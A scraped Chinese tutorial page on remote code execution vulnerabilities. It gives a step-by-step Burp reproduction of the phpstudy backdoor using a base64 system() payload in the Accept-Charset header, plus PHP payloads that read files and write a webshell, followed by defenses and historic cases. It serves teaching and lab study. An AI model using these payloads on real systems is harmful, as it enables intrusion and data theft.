当前位置: 首页 > news >正文

佛山中小企业网站制作厦门网站建设平台

佛山中小企业网站制作,厦门网站建设平台,免费做链接的网站吗,扎金花网站怎么做RCE 漏洞 1.漏洞描述 Remote Command/Code Execute 远程命令执行/远程代码执行漏洞 这种漏洞通常出现在应用程序或操作系统中,攻击者可以通过利用漏洞注入恶意代码,并在受攻击的系统上执行任意命令。 2.漏洞场景 PHP 代码执行PHP 代码注入OS 命令执…

RCE 漏洞

1.漏洞描述

  • Remote Command/Code Execute

  • 远程命令执行/远程代码执行漏洞

  • 这种漏洞通常出现在应用程序或操作系统中,攻击者可以通过利用漏洞注入恶意代码,并在受攻击的系统上执行任意命令。

2.漏洞场景

  • PHP 代码执行
  • PHP 代码注入
  • OS 命令执行
  • OS 命令注入
  • Java、Python……
  • Web 应用程序
  • 远程服务
  • 操作系统漏洞

3.漏洞原理

传入 PHP 代码执行函数的变量,客户端可控,并且没有做严格的过滤。那么攻击者可以随意输入(注入,注射,Inject)想要执行的代码,并且在服务器端执行。如果代码在服务器端执行成功,就认为存在 PHP 代码注入漏洞,也就是 RCE。

4.漏洞危害

继承当前用户权限:

  • GetShell,执行代码或命令。
  • 读写文件。
  • 反弹Shell。
  • 控制网站。
  • 控制系统。

5.漏洞评级

RCE漏洞通常被评级为高危或严重的漏洞,因为其危害性较大,能够导致系统完全被攻击者控制。

6.漏洞验证

  • phpstudy_2016-2018_rce_backdoor 漏洞复现

  • 打开 bp

    image-20231016121951332

  • 打开代理浏览器

    image-20231016122015833

  • 访问 php 页面

    image-20231016122049698

    image-20231016122109271

  • 回到 bp

    查看 http 历史,找到刚刚访问的 php 页面

    image-20231016122211545

  • 发送到 Repeater

    image-20231016122237107

  • 转到 Repeater

    image-20231016122308061

  • php 页面请求内容加

    Accept-Charset: 
    
  • 修改 Accept-Encoding,删除 deflate 前的空格

    Accept-Encoding: gzip,deflate
    
  • 将要执行的命令写入到 system(“”) 中如

    system("whoami");
    
  • Decoder 模块 base64 编码

    # 对 system("whoami") 编码
    c3lzdGVtKCJ3aG9hbWkiKTs=
    

    image-20231016121748478

  • 将编码放到 Accept-Charset:

    Accept-Charset: c3lzdGVtKCJ3aG9hbWkiKTs=
    

    image-20231016122431232

  • 点击 Send 发送

  • 查看返回的数据

  • 成功回显执行的命令

    image-20231016122527558

7.漏洞利用

代码执行漏洞的利用方式有很多种。

获取Shell,蚁剑可以直接连接。

shell: http://10.4.7.187/php/functions/eval.php
pass: code

获取当前文件的绝对路径。

?code=print(__FILE__);

读文件。

?code=print(file_get_contents('eval.php'));
?code=print(file_get_contents('c:/windows/system32/drivers/etc/hosts'));

写文件。

?code=file_put_contents('shell.php','<?php phpinfo();?>');
?code=file_put_contents(要写入的文件,要写入的内容)

8.漏洞防御

  • 尽量避免使用危险函数
  • 对用户输入的数据进行严格的验证和过滤,确保只接受预期的输入。
  • 限制应用程序或系统的权限,确保用户或攻击者无法执行危险的操作。
  • 及时更新和修复应用程序、操作系统和依赖库中的漏洞,以减少攻击面。
  • 输入验证、输出转义、防止代码注入等。

9.典型案例

  • 2017年Equifax数据泄露事件:攻击者利用RCE漏洞入侵了Equifax的服务器,窃取了超过1亿个消费者的敏感信息。
  • 2014年Shellshock漏洞:Shellshock是一个影响Bash(Unix和Linux操作系统中的一种Shell)的RCE漏洞,攻击者可以通过恶意环境变量注入恶意代码并执行任意命令。
  • 2010年Stuxnet蠕虫:Stuxnet是一种利用RCE漏洞的恶意软件,攻击了伊朗的核设施,导致严重的设备损坏。
http://www.hengruixuexiao.com/news/21155.html

相关文章:

  • 外国人做僾视频网站网络营销成功案例有哪些2022
  • 租用大型服务器多少钱sem和seo有什么区别
  • 电话销售企业网站怎么做合肥百度搜索优化
  • 益保网做推广网站吗seo哪里有培训
  • wordpress缓存与手机版动态切换刷关键词排名seo
  • 哪个网站有做视频转场的素材2020年度关键词有哪些
  • 网站子页面怎么做的如何做好一个营销方案
  • 自己做的网站如何让别人访问seo服务销售招聘
  • 股票网站怎么做动态表格四川seo推广方案
  • 域名申请好了怎么做网站怎么有自己的网站
  • 做网站的工作叫什么网络营销的主要手段和策略
  • 服装网站怎么做白杨seo课程
  • 免费ppt模板哪里下载seo销售好做吗
  • 什么网站做推广农产品比较好活动推广宣传方案
  • 外贸网站开发哪家好网站免费推广软件
  • 企业做网站营销简述获得友情链接的途径
  • 广州网站开发 d广州亦客网络新闻头条最新消息今日头条
  • 怀集县住房和城乡规划建设网站沧州搜索引擎优化
  • 和小学生做的黄色网站seo建设
  • 网站服务器空间谷歌网站
  • 营销型网站开发方案企业文化经典句子
  • 网站制作 南京百度外链查询工具
  • 阿里免费域名申请搜索引擎优化排名品牌
  • 做网站改版的厦门人才网官网
  • 丹阳做公司网站企业网站seo方案
  • ip安装wordpress关键词优化系统
  • 提交网站seo综合查询平台官网
  • 遵义会议在线网站优化关键词
  • 花生棒做网站百度网址链接
  • wordpress采集淘宝客商品广州seo优化外包服务